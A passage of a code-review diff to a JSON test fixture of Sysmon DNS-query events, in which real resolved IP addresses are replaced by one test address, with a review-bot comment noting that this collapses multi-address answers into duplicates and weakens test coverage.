Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -155,7 +155,7 @@ "ProcessId": "2736", "QueryName": "static-global-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;" + "QueryResults": "type: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" } } }, 
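Review bot: Replacing both answers of the static-global-s-msn-com.akamaized.net QueryResults with the same 89.160.20.156 collapses a two-address DNS response into duplicates, so this fixture no longer exercises how the pipeline splits and de-duplicates several distinct resolved addresses; the same collapse appears in the -155, -168, -194, -324, -337, -408 and -430 hunks of this file. Keeping the answer count but using a second address from the supported test subset, e.g. `::ffff:89.160.20.156;::ffff:<second-supported-test-ip>;` (placeholder), keeps the fixture in range while preserving that coverage. If the pipeline derives a list of related addresses from these answers, the expected-output file for this fixture (not visible here) would presumably need regenerating after such a change.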
@@ -168,7 +168,7 @@ "ProcessId": "356", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -194,7 +194,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" } }, @@ -305,7 +305,7 @@ "ProcessId": "2736", "QueryName": "linkmaker.itunes.apple.com", "QueryStatus": "0", - "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;", + "QueryResults": "type: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -313,7 +313,7 @@ "event_id": "22" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -324,7 +324,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025317300Z'/\u003e\u003cEventRecordID\u003e71\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.810\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econfiant-integrations.global.ssl.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -337,7 +337,7 @@ "ProcessId": "2736", "QueryName": "confiant-integrations.global.ssl.fastly.net", "QueryStatus": "0", - "QueryResults": "::ffff:151.101.1.194;::ffff:151.101.65.194;::ffff:151.101.129.194;::ffff:151.101.193.194;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -361,7 +361,7 @@ { "@timestamp": "2021-05-05T15:30:51.692Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -393,7 +393,7 @@ "ProcessId": "2736", "QueryName": "c.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;" + "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;" } } }, 
@@ -408,7 +408,7 @@ "ProcessId": "2736", "QueryName": "c.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;", + "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.948", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -430,7 +430,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -440,7 +440,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -450,7 +450,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.085", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -479,7 +479,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 